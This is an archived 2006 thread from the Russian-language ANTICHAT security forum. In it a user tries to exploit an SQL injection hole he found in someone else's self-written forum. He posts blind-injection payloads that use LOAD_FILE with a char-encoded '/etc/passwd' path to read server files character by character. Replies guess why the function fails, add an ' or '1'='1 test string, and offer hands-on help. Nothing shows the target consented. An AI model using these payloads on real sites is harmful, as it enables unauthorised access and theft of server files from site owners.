ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
SQL-inj на самописном форуме |
14.11.2006, 21:34
|
|
Познающий
Регистрация: 14.11.2006
Сообщений: 66
Провел на форуме:
90989
Репутация:
5
|
|
SQL-inj на самописном форуме
Нашел дырочку в одном из форумов, который судя по всему написан автором сайта.
Пытаюь проверить на существования файлы на сервере ну и потом перебором получить содержимое. К примеру /etc/passwd.
Вот как это выглядит:
Код:
view.php?forumid=1 AND -11 < (SELECT ascii(substring(LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),2,1)) FROM dayx_users LIMIT 1) /*
Воспринимается подзапрос как ложь. Т.е. всеравно что бы я написал
Код:
view.php?forumid=1 AND 1 = 0 /*
уже пробовал и так
Код:
view.php?forumid=1 AND -11 < (SELECT CONCAT(1,ascii(substring(LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),2,1))) FROM dayx_users LIMIT 1) /*
всеравно не срабатывает.
ЧТо может быть с этим оператором LOAD_FILE ?
Да, если ввожу как параметр в LOAD_FILE любое значение, то всеравно ноль реакции.
Последний раз редактировалось cop; 14.11.2006 в 21:38..
|
|
|
14.11.2006, 23:09
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
Он может быть отключен или у тебя нету прав.
|
|
|
|
14.11.2006, 23:34
|
|
Познающий
Регистрация: 14.11.2006
Сообщений: 66
Провел на форуме:
90989
Репутация:
5
|
|
Можно как-то проверить какие права у пользователя?
|
|
|
|
15.11.2006, 00:14
|
|
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
Провел на форуме:
1652093
Репутация:
490
|
|
Функция Load_file() выключена на бесплатном хостнинге
|
|
|
|
15.11.2006, 00:35
|
|
Познающий
Регистрация: 14.11.2006
Сообщений: 66
Провел на форуме:
90989
Репутация:
5
|
|
а причем здесь бесплатный хостинг?  |
|
|
|
15.11.2006, 00:59
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
view.php?forumid=1'+or+'1' ='1/*
тести если выведет тоже самое то есть inj
|
|
|
|
15.11.2006, 01:42
|
|
Познающий
Регистрация: 14.11.2006
Сообщений: 66
Провел на форуме:
90989
Репутация:
5
|
|
Та это уже прошел, там есть возможность инъекции...
|
|
|
|
15.11.2006, 02:24
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
Стучи в асю посмотрю.
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
